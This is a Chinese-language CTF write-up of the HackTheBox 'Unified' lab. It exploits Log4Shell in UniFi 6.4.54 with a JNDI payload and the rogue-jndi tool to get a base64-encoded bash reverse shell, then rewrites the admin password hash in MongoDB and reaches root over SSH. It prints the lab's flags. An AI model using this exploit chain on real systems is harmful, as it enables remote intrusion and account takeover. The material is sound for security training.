Unified

复现

开局找教程:

https://blog.csdn.net/qq_40927195/article/details/128811787

HackTheBox - Unified_unificms6.4.54_Briyney的博客-CSDN博客

开局就是一个扫描的动作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sC -sV 10.129.181.184
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-25 02:31 EDT
Nmap scan report for 10.129.181.184
Host is up (0.36s latency).
Not shown: 972 closed tcp ports (reset)
PORT      STATE    SERVICE         VERSION
17/tcp    filtered qotd
22/tcp    open     ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
465/tcp   filtered smtps
714/tcp   filtered iris-xpcs
765/tcp   filtered webster
1055/tcp  filtered ansyslmd
1110/tcp  filtered nfsd-status
1198/tcp  filtered cajo-discovery
3001/tcp  filtered nessus
3351/tcp  filtered btrieve
3737/tcp  filtered xpanel
3914/tcp  filtered listcrt-port-2
4111/tcp  filtered xgrid
5431/tcp  filtered park-agent
5510/tcp  filtered secureidprop
5906/tcp  filtered rpas-c2
6789/tcp  open     ibm-db2-admin?
8011/tcp  filtered unknown
8080/tcp  open     http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Tue, 25 Jul 2023 06:35:50 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 
|     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 
|     Found</h1></body></html>
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 302 
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Tue, 25 Jul 2023 06:35:49 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Tue, 25 Jul 2023 06:35:50 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|     Request</h1></body></html>
|   Socks5: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Tue, 25 Jul 2023 06:35:52 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
8192/tcp  filtered sophos
8443/tcp  open     ssl/nagios-nsca Nagios NSCA
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after:  2024-04-03T21:37:24
8649/tcp  filtered unknown
9091/tcp  filtered xmltec-xmlmail
9102/tcp  filtered jetdirect
10025/tcp filtered unknown
10215/tcp filtered unknown
32777/tcp filtered sometimes-rpc17
38292/tcp filtered landesk-cba
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=7/25%Time=64BF6D46%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,84,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080
SF:/manage\r\nContent-Length:\x200\r\nDate:\x20Tue,\x2025\x20Jul\x202023\x
SF:2006:35:49\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,84,"H
SF:TTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/manage\r\nCon
SF:tent-Length:\x200\r\nDate:\x20Tue,\x2025\x20Jul\x202023\x2006:35:49\x20
SF:GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x204
SF:00\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:
SF:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Tue,\x2025\x20Jul\x202023\
SF:x2006:35:50\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><ht
SF:ml\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x2
SF:0Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-family
SF::Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;ba
SF:ckground-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size
SF::16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{c
SF:olor:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:n
SF:one;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20
SF:Bad\x20Request</h1></body></html>")%r(FourOhFourRequest,24A,"HTTP/1\.1\
SF:x20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Langu
SF:age:\x20en\r\nContent-Length:\x20431\r\nDate:\x20Tue,\x2025\x20Jul\x202
SF:023\x2006:35:50\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html
SF:><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x20\xe2\x80\x9
SF:3\x20Not\x20Found</title><style\x20type=\"text/css\">body\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;
SF:background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-si
SF:ze:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20
SF:{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;border
SF::none;}</style></head><body><h1>HTTP\x20Status\x20404\x20\xe2\x80\x93\x
SF:20Not\x20Found</h1></body></html>")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\
SF:r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\
SF:r\nContent-Length:\x20435\r\nDate:\x20Tue,\x2025\x20Jul\x202023\x2006:3
SF:5:52\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20l
SF:ang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x2
SF:0Request</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma
SF:,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;backgroun
SF:d-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}
SF:\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bl
SF:ack;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</
SF:style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20
SF:Request</h1></body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 411.50 seconds

开放端口有:22、6789、8080、8443

扫描显示端口8080打开,正在运行HTTP代理。代理似乎将请求重定向到端口8443,该端口似乎正在运行SSL web服务器。我们注意到端口8443上页面的HTTP标题是“UniFi网络”。

访问8080端口,重定向到这里:https://10.129.181.184:8443/manage/account/login?redirect=%2Fmanage

不贴图了,上传太麻烦了,大概就是一个登录界面,显示UniFi 6.4.54 的CMS(内容管理系统)

网上查找版本漏洞:CVE-2021-44228(Apache Log4j远程代码执行漏洞)NVD - CVE-2021-44228 (nist.gov)

关于log4j的更多资料:What’s Going on With Log4j? (hackthebox.com)

先抓个包,接下来就是验证这个网站是否真的存在这个漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#登录验证的原始包
POST /api/login HTTP/1.1
Host: 10.129.183.167:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.129.183.167:8443/manage/account/login?redirect=%2Fmanage
Content-Type: application/json; charset=utf-8
Origin: https://10.129.183.167:8443
Content-Length: 74
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
    "username":"admin",
    "password":"admin1234",
    "remember":false,
    "strict":true
}

Untitled

payload:${jndi:ldap://{TunX IP Address}/whatever}

探测注入点是否存在,If the request causes the server to connect back to us, then we have verified that the application is vulnerable.(假如请求引起的服务器回连我们,我们就已经验证了应用程序存在漏洞。)

Untitled

JNDI是Java命名和目录接口API的首字母缩写。通过调用此API,应用程序可以定位资源和其他程序对象。资源是一个程序对象,它提供与系统(如数据库服务器和消息传递系统)的连接。

LDAP是轻量级目录访问协议的缩写,它是一种开放的、与供应商无关的、行业标准的应用程序协议,用于通过Internet或网络访问和维护分布式目录信息服务。LDAP运行的默认端口是端口389。

ifconfig确认ip后开始监听tun0:

1
2
3
4
5
6
┌──(root㉿kali)-[/home/kali/Desktop]
└─#  tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
08:06:56.744094 IP 10.129.202.83.38274 > 10.10.14.84.ldap: Flags [S], seq 4090119358, win 64240, options [mss 1340,sackOK,TS val 4125686722 ecr 0,nop,wscale 7], length 0
08:06:56.744126 IP 10.10.14.84.ldap > 10.129.202.83.38274: Flags [R.], seq 0, ack 4090119359, win 0, length 0

tcpdump输出显示了我们机器上正在接收的连接。这证明该应用程序确实存在漏洞,因为它正试图在LDAP端口389上连接回我们。

安装Open-JDK and Maven为了构建payload并且发送,以及能在被攻击的系统运行:

Open JDK是Java开发工具包,用于构建Java应用程序。另一方面,Maven是一个集成开发环境(IDE),可用于创建结构化项目并将我们的项目编译为jar文件。

1
2
3
4
5
6
7
┌──(root㉿kali)-[/home/kali/Desktop]
└─# mvn -v
Apache Maven 3.8.7
Maven home: /usr/share/maven
Java version: 17.0.6, vendor: Debian, runtime: /usr/lib/jvm/java-17-openjdk-amd64
Default locale: en_US, platform encoding: UTF-8
OS name: "linux", version: "6.1.0-kali9-amd64", arch: "amd64", family: "unix"

安装rogue-jndi工具并编译:

1
2
3
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package

编译成功后显示:

1
2
3
4
5
6
7
8
[INFO] Replacing /home/kali/Desktop/rogue-jndi/target/RogueJndi-1.1.jar with /home/kali/Desktop/rogue-jndi/target/RogueJndi-1.1-shaded.jar
[INFO] Dependency-reduced POM written at: /home/kali/Desktop/rogue-jndi/dependency-reduced-pom.xml
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  07:29 min
[INFO] Finished at: 2023-07-31T07:54:52-04:00
[INFO] ------------------------------------------------------------------------

查看编译后可运行的程序:

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/home/kali/Desktop/rogue-jndi]
└─# ls -al target
total 11692
drwxr-xr-x 6 root root     4096 Jul 31 07:54 .
drwxr-xr-x 5 root root     4096 Jul 31 07:54 ..
drwxr-xr-x 4 root root     4096 Jul 31 07:51 classes
drwxr-xr-x 3 root root     4096 Jul 31 07:51 generated-sources
drwxr-xr-x 2 root root     4096 Jul 31 07:52 maven-archiver
drwxr-xr-x 3 root root     4096 Jul 31 07:51 maven-status
-rw-r--r-- 1 root root    22240 Jul 31 07:52 original-RogueJndi-1.1.jar
-rw-r--r-- 1 root root 11920109 Jul 31 07:54 RogueJndi-1.1.jar

查看肉鸽帮助命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kali)-[/home/kali/Desktop/rogue-jndi]
└─# cd target    

┌──(root㉿kali)-[/home/kali/Desktop/rogue-jndi/target]
└─# java -jar RogueJndi-1.1.jar --help
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Usage: java -jar target/RogueJndi-1.0.jar [options]
  Options:
    -c, --command  Command to execute on the target server (default: 
                   /Applications/Calculator.app/Contents/MacOS/Calculator) 
    -n, --hostname Local HTTP server hostname (required for remote 
                   classloading and websphere payloads) (default: 127.0.1.1)
    -l, --ldapPort Ldap bind port (default: 1389)
    -p, --httpPort Http bind port (default: 8000)
    --wsdl         [websphere1 payload option] WSDL file with XXE payload 
                   (default: /list.wsdl)
    --localjar     [websphere2 payload option] Local jar file to load (this 
                   file should be located on the remote server) (default: 
                   ../../../../../tmp/jar_cache7808167489549525095.tmp) 
    -h, --help     Show this help

可以看到它的--command后面就跟想要执行的系统命令,我们就可以写一个反弹shell了
同时为了数据再传输过程中不丢失,我们对反弹shell命令进行base64编码
echo "/bin/bash -c '/bin/bash -i >&/dev/tcp/10.10.14.179/4444 0>&1'" | base64
这样就得到了base64加密后的shell

1
2
3
4
5
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "/bin/bash -c '/bin/bash -i >&/dev/tcp/10.10.14.84/4444 0>&1'" | base64          

L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNC44NC80NDQ0IDA+
JjEnCg==

使用肉鸽监听4444端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/home/kali/Desktop/rogue-jndi/target]
└─# java -jar RogueJndi-1.1.jar --command "bash -c {echo,L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNC44NC80NDQ0IDA+JjEnCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.84"       
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.84:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.84:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.84:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.84:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.84:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.84:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.84:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.84:1389/o=groovy to artsploit.controllers.Groovy
1
2
3
4
5
6
7
8
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvp 4444             
listening on [any] 4444 ...
10.129.202.83: inverse host lookup failed: Unknown host
connect to [10.10.14.84] from (UNKNOWN) [10.129.202.83] 48416
bash: cannot set terminal process group (7): Inappropriate ioctl for device
bash: no job control in this shell
unifi@unified:/usr/lib/unifi$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
unifi@unified:/usr/lib/unifi$ ls -al
ls -al
total 40
drwxr-xr-x 1 unifi unifi  4096 Jul 31 12:36 .
drwxr-xr-x 1 root  root   4096 Jan  2  2022 ..
drwxr-xr-x 2 unifi unifi  4096 Jan  2  2022 bin
lrwxrwxrwx 1 root  root     11 Sep 20  2021 data -> /unifi/data
drwxr-xr-x 3 unifi unifi  4096 Jan  2  2022 dl
drwxr-xr-x 3 unifi unifi 12288 Jan  2  2022 lib
lrwxrwxrwx 1 root  root     10 Sep 20  2021 logs -> /unifi/log
lrwxrwxrwx 1 root  root     14 Sep 20  2021 run -> /var/run/unifi
drwxr-xr-x 3 unifi unifi  4096 Jan  2  2022 webapps
drwxr-xr-x 3 unifi unifi  4096 Jul 31 12:36 work
unifi@unified:/usr/lib/unifi$

发现user flag:

1
2
3
unifi@unified:/home/michael$ cat user.txt
cat user.txt
6ced1a6a89e666c0620cdb10262ba127

提权部分:

查看进程,发现bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1

MongoDB是一个源代码可用的跨平台面向文档的数据库程序。
MongoDB被归类为NoSQL数据库程序,它使用具有可选模式的类似JSON的文档。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
unifi@unified:/usr/lib/unifi$ ps aux
ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
unifi          1  0.0  0.0   1080     4 ?        Ss   12:36   0:00 /sbin/docker-init -- /usr/local/bin/docker-entrypoint.sh unifi
unifi          7  0.0  0.1  18512  3044 ?        S    12:36   0:00 bash /usr/local/bin/docker-entrypoint.sh unifi
unifi         17  0.8 27.3 3676460 555952 ?      Sl   12:36   0:53 java -Dunifi.datadir=/unifi/data -Dunifi.logdir=/unifi/log -Dunifi.rundir=/var/run/unifi -Xmx1024M -Djava.awt.headless=true -Dfile.encoding=UTF-8 -jar /usr/lib/unifi/lib/ace.jar start
unifi         67  0.2  4.1 1101696 85156 ?       Sl   12:36   0:17 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi       1969  0.0  0.1  18380  3088 ?        S    13:45   0:00 bash -c {echo,L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNC44NC80NDQ0IDA+JjEnCg==}|{base64,-d}|{bash,-i}
unifi       1973  0.0  0.1  18512  3288 ?        S    13:45   0:00 bash -i
unifi       1976  0.0  0.1  18380  2992 ?        S    13:45   0:00 /bin/bash -c /bin/bash -i >&/dev/tcp/10.10.14.84/4444 0>&1
unifi       1977  0.0  0.1  18512  3448 ?        S    13:45   0:00 /bin/bash -i
unifi       2874  0.0  0.1  18380  3104 ?        S    14:18   0:00 bash -c {echo,L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNC44NC80NDQ0IDA+JjEnCg==}|{base64,-d}|{bash,-i}
unifi       2878  0.0  0.1  18512  3356 ?        S    14:18   0:00 bash -i
unifi       2881  0.0  0.1  18380  2984 ?        S    14:18   0:00 /bin/bash -c /bin/bash -i >&/dev/tcp/10.10.14.84/4444 0>&1
unifi       2882  0.0  0.1  18512  3216 ?        S    14:18   0:00 /bin/bash -i
unifi       2899  0.0  0.1  34408  2824 ?        R    14:19   0:00 ps aux

让我们通过使用mongo命令行实用程序并尝试提取管理员密码来与MongoDB服务进行交互。使用关键字UniFi Default Database在谷歌上快速搜索显示,UniFi应用程序的默认数据库名称为ace。

1
2
3
4
5
6
7
8
9
10
11
12
unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
<17 ace --eval "db.admin.find().forEach(printjson);"
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
{
        "_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
        "name" : "administrator",
        "email" : "administrator@unified.htb",
        "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
        "time_created" : NumberLong(1640900495),
        "last_site_name" : "default",

输出显示一个名为Administrator的用户。他们的密码散列位于x_shadow变量中,但在这种情况下,任何密码破解实用程序都无法破解它。相反,我们可以用自己创建的哈希更改x_shadow密码哈希,以便替换管理员密码并向管理面板进行身份验证。为此,我们可以使用mkpasswd命令行实用程序。

先使用mkpasswd -m sha-512 password命令,得到password的sha512加密后的值:

1
2
3
┌──(root㉿kali)-[/home/kali/Desktop]
└─# mkpasswd -m sha-512 password
$6$eLXCcCov55K4HCAT$29tc0YWNS6dOqvVCwzgLqzEjpAgZCGejesNSDxBaq2wYqVKvx1ezCtB9Py49tVIH9jc0Z1F778xCAgCuwAv1V.

将administrator的密码修改为password:

1
2
3
4
5
6
unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$hwb9W.VC28pwXtPT$N8DRe.81H.wB3NN5Ac/5zhGdQkKAibE/i/7I6kvKaVbWGYApa9EghEhtyqtz39qS6x6oDNRNo5z9Nk9m2VMio0"}})'
<aVbWGYApa9EghEhtyqtz39qS6x6oDNRNo5z9Nk9m2VMio0"}})'
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
2023-07-31T15:15:08.132+0100 E QUERY    [thread1] SyntaxError: illegal character @(shell eval):1:66

SHA-512或安全哈希算法512是一种哈希算法,用于将任何长度的文本转换为固定大小的字符串。每个输出产生一个长度为512位(64字节)的SHA-512。该算法通常用于电子邮件地址哈希、密码哈希…

在哈希过程中添加salt,以强制其唯一性,在不增加用户需求的情况下增加其复杂性,并减轻哈希表等密码攻击。

1
2
3
4
5
6
7
unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$eLXCcCov55K4HCAT$29tc0YWNS6dOqvVCwzgLqzEjpAgZCGejesNSDxBaq2wYqVKvx1ezCtB9Py49tVIH9jc0Z1F778xCAgCuwAv1V."}})'                                       
<q2wYqVKvx1ezCtB9Py49tVIH9jc0Z1F778xCAgCuwAv1V."}})'                                                                                                                                                                                                                                               
MongoDB shell version v3.6.3                                                                                                                                                                                                                                                                       
connecting to: mongodb://127.0.0.1:27117/ace                                                                                                                                                                                                                                                       
MongoDB server version: 3.6.3                                                                                                                                                                                                                                                                      
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })                                                                                                                                                                                                                                  
unifi@unified:/usr/lib/unifi$

查看结果有没有修改成功:

1
2
3
4
5
6
7
8
9
10
11
12
unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"                                                                                                                                                                                                  
<17 ace --eval "db.admin.find().forEach(printjson);"                                                                                                                                                                                                                                               
MongoDB shell version v3.6.3                                                                                                                                                                                                                                                                       
connecting to: mongodb://127.0.0.1:27117/ace                                                                                                                                                                                                                                                       
MongoDB server version: 3.6.3                                                                                                                                                                                                                                                                      
{                                                                                                                                                                                                                                                                                                  
        "_id" : ObjectId("61ce278f46e0fb0012d47ee4"),                                                                                                                                                                                                                                              
        "name" : "administrator",                                                                                                                                                                                                                                                                  
        "email" : "administrator@unified.htb",                                                                                                                                                                                                                                                     
        "x_shadow" : "$6$eLXCcCov55K4HCAT$29tc0YWNS6dOqvVCwzgLqzEjpAgZCGejesNSDxBaq2wYqVKvx1ezCtB9Py49tVIH9jc0Z1F778xCAgCuwAv1V.",                                                                                                                                                                 
        "time_created" : NumberLong(1640900495),                                                                                                                                                                                                                                                   
        "last_site_name" : "default",

使用管理员用户和密码成功登录,在setting里可以发现root的密码:NotACrackablePassword4U2022,使用ssh连接root用户:

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh root@10.129.202.83
root@10.129.202.83's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

最后的root flag在这里:

1
2
3
4
root@unified:~# ls
root.txt
root@unified:~# cat root.txt 
e50bc93c75b634e4b272d2f771c33681

Untitled

Listening

  1. You may be wondering what it is, and why people are so concerned about it. Some even call it the worst vulnerability since Wannna Cry.
  2. Log4j is a popular logging library for Java created in 2001. It is part of the Apache Software Foundation, however, this doesn’t mean the maintainers are paid. All of their work is volunteer-based.
  3. The logging library’s main purpose is to provide developers with a way to change the format and verbosity of logging through configuration files versus code.
许可协议

本文由FlowsecNagi编写,采用非商业性使用-相同方式共享 4.0 国际](https://creativecommons.org/licenses/by-nc-sa/4.0/) 许可协议,转载请注明出处。

快来参与讨论吧~